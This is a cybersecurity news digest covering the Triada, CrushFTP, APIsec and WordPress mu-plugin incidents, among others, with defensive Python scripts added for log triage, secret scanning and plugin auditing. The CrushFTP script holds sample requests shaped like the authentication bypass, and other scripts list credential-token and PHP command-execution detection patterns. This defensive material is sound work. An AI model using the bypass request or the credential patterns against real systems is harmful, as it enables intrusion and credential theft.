CyberSecurity news

FlagThis

@The DefendOps Diaries //
A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, raising significant cybersecurity concerns. This sophisticated malware, initially identified in 2016, has evolved to embed itself deeply into the Android system framework, making it difficult for users to detect or remove. Discovered on counterfeit versions of popular smartphone models sold at discounted prices through online stores, Triada poses a severe threat as it can steal user data immediately after device setup.

Triada's capabilities include stealing user data, such as social media and messenger accounts, and manipulating cryptocurrency transactions by replacing wallet addresses. The malware can also falsify caller IDs, monitor browser activity, and even activate premium SMS services. Experts warn that this new version infiltrates the device at the firmware level, indicating a compromised supply chain and urging users to exercise caution and purchase Android devices from reputable sources.

Recommended read:
References :
  • bsky.app: A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, allowing threat actors to steal data as soon as they are set up.
  • BleepingComputer: A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, allowing threat actors to steal data as soon as they are set up.
  • The DefendOps Diaries: Explore the threat of Triada malware in counterfeit Android devices and learn how to protect against this sophisticated cyber threat.
  • www.it-daily.net: Triada Trojan discovered on counterfeit Android smartphones

@The DefendOps Diaries //
A critical vulnerability, identified as CVE-2024-20439, has been discovered in the Cisco Smart Licensing Utility (CSLU), a Windows application used for managing licenses. This flaw exposes a built-in backdoor admin account due to an undocumented static user credential. Unauthenticated attackers are now actively exploiting this vulnerability to gain remote administrative access to unpatched systems through the CSLU app's API. Cisco has urged administrators to immediately apply the necessary patches to prevent unauthorized access and mitigate the risk.

The exploitation of CVE-2024-20439 allows attackers to bypass normal authentication procedures and gain control over the CSLU API. This provides them with the ability to manage services, extract sensitive data, and potentially move laterally within affected networks. The U.S. CISA has added this Cisco Smart Licensing Utility flaw to its Known Exploited Vulnerabilities catalog, highlighting the severity and active exploitation of this vulnerability. The vulnerability was first disclosed by Cisco in September 2024 and has since been actively exploited in the wild, raising significant concerns about network security.

Recommended read:
References :
  • bsky.app: CISA adds a Cisco Smart Licensing Utility Static Credential flaw tracked as CVE-2024-20439 to the KEV database. This flaw allows unauthenticated attackers to log in using the hardcoded credential.
  • BleepingComputer: Cisco warns admins to patch a critical Cisco Smart Licensing Utility (CSLU) vulnerability, which exposes a built-in backdoor admin account now used in attacks.
  • The DefendOps Diaries: Explore the critical Cisco Smart Licensing Utility vulnerability and learn mitigation strategies to protect your network.

Michael Kan@PCMag UK security //
North Korean threat actors are expanding their IT worker scams to Europe, according to recent reports from Google's Threat Intelligence Group and other security researchers. These actors, posing as remote IT staff, are targeting companies in Germany, Portugal, and the UK, seeking employment in various sectors, including the defense industry and government. This shift comes after increased awareness and crackdowns in the United States made it more difficult for them to maintain employment there. The ultimate goal of this scheme is to generate revenue for the North Korean government, steal sensitive data, and potentially extort companies.

The North Korean IT workers use fabricated identities, claiming nationalities from countries such as Italy, Japan, Malaysia, Singapore, Ukraine, the US, and Vietnam. They often operate multiple personas simultaneously, with one individual found to have at least 12 identities across Europe and the US. To secure employment, they provide fake references, build rapport with recruiters, and even utilize online platforms like Upwork, Telegram, and Freelancer. Payments are typically facilitated through cryptocurrency to obfuscate the flow of funds back to North Korea. This sophisticated operation highlights the global reach and adaptability of North Korean cyber threat actors.

Recommended read:
References :
  • Risky Business Media: Risky Bulletin: North Korean IT worker scams expand to Europe
  • PCMag UK security: As US Cracks Down, North Koreans Target Europe With Remote Work Scams
  • North Korea's Fake IT Worker Scheme Sets Sights on Europe
  • www.itpro.com: Google warns that fake North Korean IT workers have expanded to Europe
  • The Register - Security: North Korea’s fake tech workers now targeting European employers

Matt Swayne@The Quantum Insider //
Recent developments highlight ongoing efforts to transition to quantum-safe cryptography. The UK's National Cyber Security Centre (NCSC) has published a roadmap for post-quantum cryptography (PQC) migration, urging organizations to complete a discovery phase by 2028, high-priority migration activities by 2031, and full transition by 2035. This roadmap aligns with similar initiatives, such as the US focus on post-quantum cryptography, signaling a global push to mitigate the threat posed by future quantum computers. Unisys has also launched Post-Quantum Cryptography services to strengthen cybersecurity.

ETSI has launched a new post-quantum security standard designed to protect critical data from future quantum computing threats. The standard introduces Covercrypt, a hybrid encryption system that secures data by allowing only authorized users to access session keys based on specific user attributes, ensuring both current and future quantum-safe protection. Organizations are already adopting ETSI’s standard to enhance security infrastructure and comply with future-proof cryptographic requirements. Furthermore, OpenSSL 3.5 is integrating PQC methods.


Nazy Fouladirad@AI Accelerator Institute //
As generative AI adoption rapidly increases, securing investments in these technologies has become a paramount concern for organizations. Companies are beginning to understand the critical need to validate and secure the underlying large language models (LLMs) that power their Gen AI products. Failing to address these security vulnerabilities can expose systems to exploitation by malicious actors, emphasizing the importance of proactive security measures.

Microsoft is addressing these concerns through innovations in Microsoft Purview, which offers a comprehensive set of solutions aimed at helping customers seamlessly secure and confidently activate data in the AI era. Complementing these efforts, Fiddler AI is focusing on building trust into AI systems through its AI Observability platform. This platform emphasizes explainability and transparency. They are helping enterprise AI teams deliver responsible AI applications, and also ensure people interacting with AI receive fair, safe, and trustworthy responses. This involves continuous monitoring, robust security measures, and strong governance practices to establish long-term responsible AI strategies across all products.

The emergence of agentic AI, which can plan, reason, and take autonomous action to achieve complex goals, further underscores the need for enhanced security measures. Agentic AI systems extend the capabilities of LLMs by adding memory, tool access, and task management, allowing them to operate more like intelligent agents than simple chatbots. Security controls and human oversight are essential to deploying them safely. Gartner research indicates that a significant portion of organizations plan to pursue agentic AI initiatives, making it crucial to address the security risks associated with these systems.


@The GreyNoise Blog //
Cybersecurity researchers have issued a warning about a significant surge in suspicious login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect gateways. Nearly 24,000 unique IP addresses have been observed attempting to access these portals, raising concerns among experts. The activity is suspected to be a coordinated effort aimed at identifying exposed or vulnerable systems, potentially as a precursor to targeted exploitation. GreyNoise, a threat intelligence firm, has indicated that this pattern suggests a systematic probing of network defenses.

The surge reportedly began on March 17, 2025, with the number of unique IP addresses involved peaking at nearly 20,000 per day before tapering off around March 26. Of the total IPs involved, a smaller subset of 154 have been flagged as malicious. The United States and Canada have been identified as the primary sources of the traffic, while systems in the United States, the United Kingdom, Ireland, Russia, and Singapore are the main targets. Organizations using Palo Alto Networks products are urged to take immediate steps to secure their login portals.
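The signal GreyNoise describes is the number of distinct source IPs per day hitting the GlobalProtect login endpoints. The script below is an added example, not GreyNoise's or Palo Alto Networks' tooling: it reads plain access-log lines, keeps only requests to the GlobalProtect portal paths, counts unique client IPs per day, and flags any day whose count reaches a multiple of a baseline you supply from prior weeks. The log lines, the path list and the baseline value are constructed for the example; adapt LINE_RE to your proxy or firewall log format.

```python
"""Added example: per-day unique-source counts for GlobalProtect login
endpoints, with a simple surge flag.  Log lines, paths and baseline are
constructed for illustration.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed log format: "<date> <client-ip> <method> <path> <status>"
SAMPLE_LOG = """\
2025-03-16 198.51.100.7 POST /global-protect/login.esp 200
2025-03-16 198.51.100.8 POST /global-protect/login.esp 200
2025-03-17 203.0.113.1 POST /global-protect/login.esp 200
2025-03-17 203.0.113.2 POST /global-protect/login.esp 200
2025-03-17 203.0.113.3 POST /global-protect/login.esp 200
2025-03-17 203.0.113.3 POST /global-protect/login.esp 200
2025-03-17 203.0.113.4 GET /global-protect/portal/portal.esp 200
2025-03-17 203.0.113.5 POST /global-protect/login.esp 200
2025-03-17 203.0.113.6 POST /global-protect/login.esp?tmp=1 200
2025-03-17 198.51.100.9 GET /index.html 404
"""

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}) (\S+) (\S+) (\S+) (\d{3})$")

# GlobalProtect portal/gateway login paths (assumed list for the example).
GP_PATHS = (
    "/global-protect/login.esp",
    "/global-protect/portal/portal.esp",
    "/ssl-vpn/login.esp",
)


def unique_ips_per_day(log_text: str) -> Dict[str, Set[str]]:
    """Map each day to the set of distinct client IPs that touched a
    GlobalProtect login path.  Query strings are ignored when matching."""
    per_day: Dict[str, Set[str]] = defaultdict(set)
    for line in log_text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # unparseable line: skip rather than guess
        day, ip, _method, path, _status = match.groups()
        if path.split("?", 1)[0] in GP_PATHS:
            per_day[day].add(ip)
    return dict(per_day)


def surge_days(per_day: Dict[str, Set[str]], baseline: int, factor: float = 3.0) -> List[str]:
    """Days whose distinct-source count is at least baseline * factor.
    baseline: typical daily unique-IP count from prior, quiet weeks."""
    return sorted(day for day, ips in per_day.items() if len(ips) >= baseline * factor)


def sources_on(per_day: Dict[str, Set[str]], day: str) -> List[str]:
    """Sorted source IPs for a flagged day, ready for enrichment or blocking."""
    return sorted(per_day.get(day, set()))


if __name__ == "__main__":
    counts = unique_ips_per_day(SAMPLE_LOG)
    for day in surge_days(counts, baseline=2):
        print(f"{day}: {len(counts[day])} distinct sources -> {sources_on(counts, day)}")
```

The threshold is deliberately crude; the point is that the count of distinct sources, not request volume, is what separated this campaign from background noise, and it is the value worth trending against your own portal's history.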

Recommended read:
References :
  • The Hacker News: Nearly 24,000 IPs Target PAN-OS GlobalProtect in Coordinated Login Scan Campaign
  • BleepingComputer: Nearly 24,000 IPs behind wave of Palo Alto Global Protect scans
  • The GreyNoise Blog: Surge in Palo Alto Networks Scanner Activity Indicates Possible Upcoming Threats
  • securityaffairs.com: Spike in Palo Alto Networks scanner activity suggests imminent cyber threats

Pierluigi Paganini@Security Affairs //
Apple has released security updates to address actively exploited zero-day vulnerabilities impacting older iPhones and Macs. The patches aim to fix flaws that could allow malicious actors to elevate privileges or execute arbitrary code on affected devices. These updates address CVE-2025-24200, CVE-2025-24201, and CVE-2025-24085, and are now available for iOS 15.8.4, iPadOS 15.8.4, iOS 16.7.11, iPadOS 16.7.11, macOS Sonoma 14.7.5, and macOS Ventura 13.7.5.

The vulnerabilities are a use-after-free bug in the Core Media component (CVE-2025-24085), an authorization issue in the Accessibility component (CVE-2025-24200), and an out-of-bounds write in the WebKit component (CVE-2025-24201). Apple first fixed CVE-2025-24200 in iOS 18.3.1, iPadOS 18.3.1, and iPadOS 17.7.5, released on February 10, 2025; that flaw allowed an attacker with physical access to a locked device to disable USB Restricted Mode. Users of older devices, including iPhone 6s, iPhone 7, iPhone 8, iPhone X, iPad Air 2, and various iPad Pro models, are urged to update to safeguard against these threats.

Recommended read:
References :
  • bsky.app: EMERGENCY UPDATES Apple pushed additional updates for 3 zero-days that may have been actively exploited. CVE-2025-24200 (Accessibility) additional patches, CVE-2025-24201 (WebKit) additional patches: - iOS and iPadOS 15.8.4 - iOS and iPadOS 16.7.11
  • CyberInsider: Apple has issued a wide set of security updates, patching multiple zero-day vulnerabilities across its operating systems — including iOS, macOS, iPadOS, and Safari — and notably extended critical fixes to older software versions, addressing previously exploited flaws.
  • isc.sans.edu: Apple Patches Everything: March 31st 2025 Edition, (Mon, Mar 31st)
  • The Apple Post: Apple releases iOS 18.4 with Priority Notifications feature, Control Center updates, new emoji, more
  • bsky.app: NEW SECURITY CONTENT - macOS Sequoia 15.4 - 131 bugs fixed macOS Sonoma 14.7.5 - 91 bugs fixed macOS Ventura 13.7.5 - 85 bugs fixed iOS and iPadOS 18.4 - 62 bugs fixed visionOS 2.4 - 38 bugs fixed iPadOS 17.7.6 - 38 bugs fixed tvOS 18.4 - 36 bugs fixed
  • CyberScoop: The company released a host of security patches Monday, including ones that address two zero-day vulnerabilities.
  • securityaffairs.com: Apple has backported fixes for three actively exploited vulnerabilities to older devices and OS versions.
  • The Hacker News: Apple Backports Critical Fixes for 3 Live Exploits Impacting iOS and macOS Legacy Devices
  • BleepingComputer: Apple backports zero-day patches to older iPhones and Macs

@The DefendOps Diaries //
A critical authentication bypass vulnerability, identified as CVE-2025-2825, is actively being exploited in CrushFTP file transfer software. Attackers are leveraging publicly available proof-of-concept code to gain unauthenticated access to unpatched devices. The flaw affects CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0, with security analysts confirming that a significant number of instances remain unpatched despite the availability of patches since March 26, 2025. Project Discovery has published a technical write-up and PoC for the bypass.

The vulnerability stems from improper handling of HTTP requests utilizing S3-style authorization headers. Attackers can craft malicious AWS S3-style authorization headers containing a valid username, bypassing password verification. Once access is gained, attackers can execute administrative commands, download sensitive files, create new administrator accounts, and upload malicious payloads, potentially leading to complete system compromise. CrushFTP has addressed this in version 11.3.1 by introducing a new security parameter, s3_auth_lookup_password_supported, set to false by default.
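For responders working the description above, two facts matter: whether a given CrushFTP build is in the affected ranges, and which username an AWS-SigV4-style Authorization header names, since the bypass rests on that field holding a valid user. The script below is an added example, not CrushFTP's or Project Discovery's code. It checks a version string against the ranges 10.0.0-10.8.3 and 11.0.0-11.3.0, pulls the username out of the Credential field of a SigV4 header, and escalates SigV4 headers aimed at the web-interface API rather than at an S3-protocol endpoint. The /WebInterface/ path prefix, the usernames and the request records are assumptions made for the example.

```python
"""Added example: triage helpers for CVE-2025-2825, built from the public
description.  The /WebInterface/ prefix, usernames and requests are
constructed for illustration.
"""
import re
from typing import Dict, List, Optional, Tuple

VULNERABLE_RANGES = [((10, 0, 0), (10, 8, 3)), ((11, 0, 0), (11, 3, 0))]


def parse_version(version: str) -> Tuple[int, int, int]:
    """'11.3.1' -> (11, 3, 1); missing components count as 0."""
    parts = [int(p) for p in version.strip().split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    return parts[0], parts[1], parts[2]


def is_affected(version: str) -> bool:
    ver = parse_version(version)
    return any(lo <= ver <= hi for lo, hi in VULNERABLE_RANGES)


# AWS Signature Version 4 header shape:
#   AWS4-HMAC-SHA256 Credential=<access-key-id>/<date>/<region>/s3/aws4_request,
#   SignedHeaders=..., Signature=...
# The <access-key-id> slot is the one the vulnerable code read as a username.
SIGV4_RE = re.compile(r"AWS4-HMAC-SHA256\s+Credential=([^/,\s]+)/")


def s3_username(authorization: str) -> Optional[str]:
    match = SIGV4_RE.search(authorization)
    return match.group(1) if match else None


def flag_request(method: str, path: str, headers: Dict[str, str]) -> Optional[dict]:
    """Return a finding for any SigV4-authenticated request; escalate when it
    targets the web-interface API (assumed /WebInterface/ prefix), where a
    real S3 client has no business sending SigV4."""
    auth = headers.get("Authorization") or headers.get("authorization")
    if not auth:
        return None
    user = s3_username(auth)
    if user is None:
        return None
    return {
        "method": method,
        "path": path,
        "user": user,
        "escalate": path.startswith("/WebInterface/"),
    }


# Constructed request records: (method, path, headers).
SAMPLE_REQUESTS: List[Tuple[str, str, Dict[str, str]]] = [
    ("GET", "/WebInterface/function/?command=getUserList",
     {"Authorization": "AWS4-HMAC-SHA256 Credential=admin/20250326/us-east-1/s3/aws4_request, "
                       "SignedHeaders=host, Signature=0000"}),
    ("PUT", "/backups/2025-03-26.tar",
     {"Authorization": "AWS4-HMAC-SHA256 Credential=backup-svc/20250326/us-east-1/s3/aws4_request, "
                       "SignedHeaders=host;x-amz-date, Signature=1111"}),
    ("GET", "/WebInterface/login.html", {}),
    ("GET", "/WebInterface/function/?command=getUserList",
     {"Authorization": "Basic dXNlcjpwYXNz"}),
]


def triage(requests=SAMPLE_REQUESTS) -> List[dict]:
    return [f for f in (flag_request(*r) for r in requests) if f]


if __name__ == "__main__":
    print("11.3.0 affected:", is_affected("11.3.0"), "| 11.3.1 affected:", is_affected("11.3.1"))
    for hit in triage():
        tag = "ESCALATE" if hit["escalate"] else "info    "
        print(f"{tag} user={hit['user']} {hit['method']} {hit['path']}")
```

Usernames surfaced by s3_username() are the pivot for the rest of the investigation: if one is a real account, check its activity for the administrative commands, file downloads and new admin accounts the advisory warns about.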

Recommended read:
References :
  • bsky.app: Project Discovery has published a technical write-up and PoC for a recent CrushFTP authentication bypass tracked as CVE-2025-2825
  • The DefendOps Diaries: Understanding the CrushFTP Authentication Bypass Vulnerability: A Critical Cybersecurity Threat
  • BleepingComputer: Attackers are now targeting a critical authentication bypass vulnerability in the CrushFTP file transfer software using exploits based on publicly available proof-of-concept code.
  • Rescana: CrushFTP CVE-2025-2825 Vulnerability: Critical Authentication Bypass Exploit and Mitigation Strategies
  • community.emergingthreats.net: CrushFTP Authentication Bypass (CVE-2025-2825) (web_specific_apps.rules)
  • securityaffairs.com: CrushFTP CVE-2025-2825 flaw actively exploited in the wild
  • www.cybersecuritydive.com: Critical vulnerability in CrushFTP file transfer software under attack

Dissent@DataBreaches.Net //
A former GCHQ intern, Hasaan Arshad, has pleaded guilty to violating the Computer Misuse Act by transferring top-secret data from a secure GCHQ computer to his work phone. He then moved the data to a personal hard drive connected to his home PC. Arshad admitted to the unauthorized acts, which prosecutors say involved a "top secret" tool worth millions of pounds. The tool was developed using a "significant amount" of taxpayer money.

Arshad, a student at the University of Manchester, was arrested and his home searched in September 2022. While he claimed his actions stemmed from curiosity and a desire to further develop the software, the incident underscores the risk of insider threats. Cybersecurity experts highlight the need for organizations to implement strict access controls, restrict removable media, and manage mobile device capabilities in sensitive areas to prevent such breaches.

Recommended read:
References :
  • DataBreaches.Net: Here’s today’s reminder of the insider threat (well, this, and the fact that U.S. government officials continue to deny any problem with discussing attack plans on Signal).
  • The Register - Security: Not exactly Snowden levels of skill. A student at Britain's top eavesdropping government agency has pleaded guilty to taking sensitive information home on the first day of his trial.
  • www.itpro.com: A former GCHQ intern has pleaded guilty to transferring data from a top-secret computer onto his work phone.

Microsoft Threat@Microsoft Security Blog //
Microsoft has uncovered 20 previously unknown vulnerabilities in the GRUB2, U-Boot, and Barebox open-source bootloaders using its AI-powered Security Copilot. These bootloaders are critical components, with GRUB2 commonly used in Linux distributions like Ubuntu, and U-Boot and Barebox prevalent in embedded and IoT devices. The identified vulnerabilities include integer and buffer overflows in filesystem parsers, command flaws, and a side-channel in cryptographic comparison, potentially enabling threat actors to gain control and execute arbitrary code.

Water Gamayun, a suspected Russian hacking group, has been linked to the exploitation of CVE-2025-26633 (MSC EvilTwin) to deploy two backdoors, SilentPrism and DarkWisp. The group delivers information stealers and backdoors through malicious provisioning packages, signed .msi files, and Windows MSC files. SilentPrism and DarkWisp provide persistence, system reconnaissance, data exfiltration, and remote command execution. After initially distributing several malware families from a GitHub repository, the actors moved staging and command-and-control to their own infrastructure.

Recommended read:
References :
  • The Hacker News: The threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp. The activity has been attributed to a suspected Russian hacking group called Water Gamayun, which is also known as EncryptHub and LARVA-208. "The threat actor deploys payloads primarily by means of
  • Microsoft Security Blog: Using Microsoft Security Copilot to expedite the discovery process, Microsoft has uncovered several vulnerabilities in multiple open-source bootloaders impacting all operating systems relying on Unified Extensible Firmware Interface (UEFI) Secure Boot. Through a series of prompts, we identified and refined security issues, ultimately uncovering an exploitable integer overflow vulnerability in the GRUB2, U-boot, and Barebox bootloaders.
  • bsky.app: Microsoft used its AI-powered Security Copilot to discover 20 previously unknown vulnerabilities in the GRUB2, U-Boot, and Barebox open-source bootloaders. https://www.bleepingcomputer.com/news/security/microsoft-uses-ai-to-find-flaws-in-grub2-u-boot-barebox-bootloaders/
  • BleepingComputer: Microsoft uses AI to find flaws in GRUB2, U-Boot, Barebox bootloaders

@upguard.com //
API security testing firm APIsec exposed an internal database to the internet without a password, potentially compromising customer data. The database contained customer info and other data generated while monitoring customer APIs for security weaknesses, according to researchers at UpGuard, who discovered the exposed database on March 5th, 2025. UpGuard notified APIsec, and the database was secured the same day. APIsec claims to be used by 80% of the Fortune 100.

The exposed Elasticsearch database contained over three terabytes of data, including configuration information for private scanning instances, results of API scans for customers’ endpoints, and personal information for users collected during scanning. This data provided extensive information about the attack surfaces of APIsec's customers. The database contained indices for executing the APIsec test suites against customer APIs and storing the results, with data spanning from 2018 to 2025.

The APIsec platform helps companies secure their APIs by running tests for common weaknesses. The exposed data included information about which tests were being performed, allowing attackers to potentially look for issues not being tested. The index "fx-accounts" included usernames and credentials for services like AWS, Slack, and GitHub. The index "fx-clusters" contained configuration data for APIsec scanning instances, some of which contained the same AWS access key as the record in "fx-accounts."
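Once an exposed index like this has been pulled down, the first question is which documents carry live credentials and whether the same secret is reused elsewhere, as the report says happened between "fx-accounts" and "fx-clusters". The script below is an added example, not UpGuard's or APIsec's code: given Elasticsearch-style hits (_index, _id, _source), it walks every string in _source, matches against the published token formats for AWS access key IDs, Slack tokens and GitHub tokens, and reports any secret seen in more than one index. The documents are constructed; the AWS key is the example key from AWS documentation and the other tokens are placeholder-shaped.

```python
"""Added example: find service credentials in exported index documents and
report cross-index reuse.  Documents below are constructed; no real secrets.
"""
import re
from collections import defaultdict
from typing import Any, Dict, Iterator, List, Set, Tuple

# Published token shapes.  A hit is a strong signal but still needs
# confirmation against the provider before it is declared live.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "slack_token": re.compile(r"\bxox[abpr]-[0-9A-Za-z-]{10,}\b"),
    "github_token": re.compile(r"\bgh[posur]_[0-9A-Za-z]{36}\b"),
}

# Constructed Elasticsearch-style hits modelled on the indices named in the report.
SAMPLE_EXPORT: List[Dict[str, Any]] = [
    {"_index": "fx-accounts", "_id": "1",
     "_source": {"service": "aws", "username": "ci-runner", "access_key": "AKIAIOSFODNN7EXAMPLE"}},
    {"_index": "fx-accounts", "_id": "2",
     "_source": {"service": "slack", "token": "xoxb-1234567890-abcdefghij"}},
    {"_index": "fx-accounts", "_id": "3",
     "_source": {"service": "github", "token": "ghp_0123456789abcdefghijklmnopqrstuvwxyz"}},
    {"_index": "fx-clusters", "_id": "c-7",
     "_source": {"cluster": "scan-eu-1", "env": {"AWS_ACCESS_KEY_ID": "AKIAIOSFODNN7EXAMPLE"}}},
    {"_index": "fx-clusters", "_id": "c-8",
     "_source": {"cluster": "scan-us-2", "notes": "no creds here"}},
]


def walk_strings(obj: Any, path: str = "") -> Iterator[Tuple[str, str]]:
    """Yield (dotted.field.path, value) for every string nested in obj."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from walk_strings(val, f"{path}.{key}" if path else str(key))
    elif isinstance(obj, list):
        for i, val in enumerate(obj):
            yield from walk_strings(val, f"{path}[{i}]")
    elif isinstance(obj, str):
        yield path, obj


def find_secrets(docs: List[Dict[str, Any]]) -> List[Dict[str, str]]:
    findings = []
    for doc in docs:
        for field, value in walk_strings(doc.get("_source", {})):
            for kind, pattern in PATTERNS.items():
                for match in pattern.finditer(value):
                    findings.append({"index": doc["_index"], "doc_id": doc["_id"],
                                     "field": field, "kind": kind, "value": match.group(0)})
    return findings


def cross_index_reuse(findings: List[Dict[str, str]]) -> Dict[str, Set[str]]:
    """Secrets that appear in more than one index (the fx-accounts/fx-clusters case)."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for f in findings:
        seen[f["value"]].add(f["index"])
    return {value: idx for value, idx in seen.items() if len(idx) > 1}


def redact(value: str) -> str:
    """Keep a recognisable prefix/suffix for reports without echoing the secret."""
    return value[:4] + "..." + value[-2:]


if __name__ == "__main__":
    found = find_secrets(SAMPLE_EXPORT)
    for f in found:
        print(f"{f['index']}/{f['doc_id']} {f['field']}: {f['kind']} {redact(f['value'])}")
    for value, indices in cross_index_reuse(found).items():
        print(f"REUSED across {sorted(indices)}: {redact(value)}")
```

Rotating a reused key has to cover every place it was found, which is why the reuse map, not just the per-document list, is the output to hand to the owning team.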

Recommended read:
References :
  • Zack Whittaker: New: API security testing firm APIsec exposed an internal database to the internet without a password. The database contained customer info and other data generated while monitoring customer APIs for security weaknesses, per researchers at UpGuard, which found it.
  • techcrunch.com: API testing firm APIsec exposed customer data during security lapse
  • www.upguard.com: Watching the Watcher: How a Security Company Leaked Customer Data | UpGuard
  • CyberInsider: Security Firm APIsec Exposed 3TB of Sensitive Customer Data

do son@securityonline.info //
Russia-aligned cyber threat groups UAC-0050 and UAC-0006 are actively using bulletproof hosting infrastructures to conduct cyberattacks globally. These networks, often obscured by offshore shell companies, provide a shield for malicious activities including espionage, financial theft, and psychological operations. Intrinsec analysts have uncovered campaigns blending cyber espionage, financial theft, and psychological warfare, primarily targeting Ukraine and its allies with tactics like bomb threats and fake banking transactions.

These threat groups heavily rely on bulletproof hosting providers to evade detection. Entities like Global Connectivity Solutions LLP and Railnet LLC act as legal fronts, using offshore shell companies in jurisdictions like Seychelles to make attribution and legal action difficult. This infrastructure also supports ransomware groups like Black Basta and RansomHub and involves frequent IP migrations across autonomous systems, further complicating efforts to block malicious activities. UAC-0050 has also engaged in psychological operations, such as sending bomb threats to Ukrainian institutions under the guise of the "Fire Cells Group."

Recommended read:
References :
  • securityonline.info: Bulletproof Hosting Fuels Russia-Linked Intrusion Sets’ Global Cyber Campaign
  • Cyber Security News: Russian Hackers Use Bulletproof Network Infrastructure to Evade Detection
  • gbhackers.com: Russian Hackers Leverage Bulletproof Hosting to Shift Network Infrastructure

do son@securityonline.info //
Cybersecurity analysts have uncovered a sophisticated campaign exploiting a fake Zoom installer to deliver BlackSuit ransomware across Windows-based systems. The attack, beginning with a malicious download from a website mimicking the teleconferencing application Zoom, lures unsuspecting victims into installing malware capable of crippling entire networks. When the victim clicked the “Download” button, they unknowingly triggered a chain reaction of events.

The fake installer, crafted with Inno Setup, hides the d3f@ckloader, a Pascal-based loader. After gaining initial access, the attackers deploy Brute Ratel and Cobalt Strike for lateral movement, using QDoor to facilitate RDP access. After 9 days, they deploy the BlackSuit ransomware across the network, deleting Volume Shadow Copies to hinder data recovery efforts before encrypting files and dropping ransom notes. The attackers also used WinRAR to compress file share data and uploaded the archives to Bublup, a cloud storage service for data exfiltration.

Recommended read:
References :
  • bsky.app: The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi).
  • BleepingComputer: North Korean hackers adopt ClickFix attacks to target crypto firms
  • Cyber Security News: Hackers Exploit Zoom Installer to Gain RDP Access and Launch BlackSuit Ransomware Attack
  • gbhackers.com: Beware! A Fake Zoom Installer Drops BlackSuit Ransomware on Your Windows Systems
  • Virus Bulletin: The DFIR Report researchers look into a fake Zoom installer that used d3f@ckloader & IDAT loader to drop SectopRAT, which dropped Cobalt Strike & Brute Ratel after 9 days. For lateral movement the threat actor used QDoor & finally deployed BlackSuit ransomware.
  • Osint10x: Fake Zoom Ends in BlackSuit Ransomware
  • securityonline.info: Fake Zoom, Real Ransom: Nine-Day Malware Intrusion Ends with BlackSuit Ransomware Blast
  • bsky.app: Lazarus adopts ClickFix technique.
  • Cyber Security News: Lazarus Hackers Use Fake Interviews “ClickFake” to Infect Windows & macOS with GO Malware
  • New “ClickFake Interview” campaign attributed to the Lazarus Group targets crypto professionals with fake job offers
  • gbhackers.com: Weaponized Zoom Installer Used by Hackers to Gain RDP Access and Deploy BlackSuit Ransomware
  • BleepingComputer: Report of the Lazarus Group adopting the ClickFix technique for malware deployment.
  • Virus Bulletin: Sekoia researchers discovered a ClickFake Interview campaign targeting job seekers with fake job interview websites. The infrastructure aligns with technical indicators linked to the Contagious Interview campaign and delivers the GolangGhost backdoor for Windows & macOS.

The Hacker News //
Security researchers have uncovered a rise in hackers exploiting WordPress mu-plugins to inject malicious code. The mu-plugins directory, designed for automatically loading essential plugins, is being used to conceal malware, enabling persistent remote access and site redirection. Because these plugins are automatically enabled and not visible in the standard WordPress plugin interface, attackers can maintain a stealthy foothold, bypassing typical security checks. This allows them to inject spam, hijack site images, and maintain long-term control over compromised sites.

Researchers at Sucuri have identified three distinct types of malicious code being deployed. One variant redirects site visitors to external malicious websites, often disguised as browser updates serving malware. Another executes a webshell, providing attackers with remote code execution capabilities. The third injects spam onto the website, replacing images with explicit content and hijacking outbound links to malicious popups. The goal of this spam injection is often to promote scams or manipulate SEO rankings. These tactics are used to target website visitors while evading detection by search engines and administrators.

Website administrators are advised to include the mu-plugins directory in their regular security scans to detect and remove any unrecognized or suspicious files. Security experts recommend ensuring WordPress, plugins, and themes are updated and employing strong passwords with two-factor authentication. If a compromise is suspected, all unauthorized admin accounts and malicious files should be removed to prevent reinfection. These measures are crucial to securing WordPress sites against this evolving threat.
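The audit the advice above calls for has two parts: every top-level .php file in wp-content/mu-plugins runs on every request with no activation step and no entry on the normal plugin screen, so any file not on the site's own allowlist is a finding in itself, and any file whose source matches the three behaviours described (off-site redirects, webshell-style execution, content or image hijacking) should be escalated. The script below is an added example, not Sucuri's tooling. load_dir() reads a real directory; the file names, contents, allowlist and indicator patterns are constructed for the example and are heuristics, not proof of compromise.

```python
"""Added example: audit a WordPress mu-plugins directory against an
allowlist and a set of behavioural indicators.  Sample files, allowlist
and patterns are constructed for illustration.
"""
import re
from pathlib import Path
from typing import Dict, Iterable, List

# Heuristic indicators grouped by the malware behaviours in the report.
INDICATORS = {
    "redirect": re.compile(r"header\s*\(\s*['\"]Location:|wp_redirect\s*\(", re.I),
    "exec": re.compile(r"\b(?:eval|system|shell_exec|passthru|exec|proc_open|assert)\s*\(", re.I),
    "obfuscation": re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "remote_fetch": re.compile(r"\b(?:file_get_contents|curl_init)\s*\(\s*['\"]https?://", re.I),
    "content_injection": re.compile(
        r"add_filter\s*\(\s*['\"](?:the_content|post_thumbnail_html|wp_get_attachment_image_src)", re.I),
}
# Indicators that warrant immediate escalation on their own; the rest
# (e.g. a the_content filter) are common in legitimate code and only
# earn a manual read.
HIGH = {"redirect", "exec", "obfuscation", "remote_fetch"}


def load_dir(mu_plugins: str) -> Dict[str, str]:
    """Read top-level .php files from a real wp-content/mu-plugins directory."""
    return {p.name: p.read_text(errors="replace") for p in sorted(Path(mu_plugins).glob("*.php"))}


def audit(files: Dict[str, str], allowlist: Iterable[str]) -> List[dict]:
    """One row per file: allowlisted or not, matched indicators, and a verdict
    of 'escalate' (high indicator), 'review' (unknown file or weak indicator)
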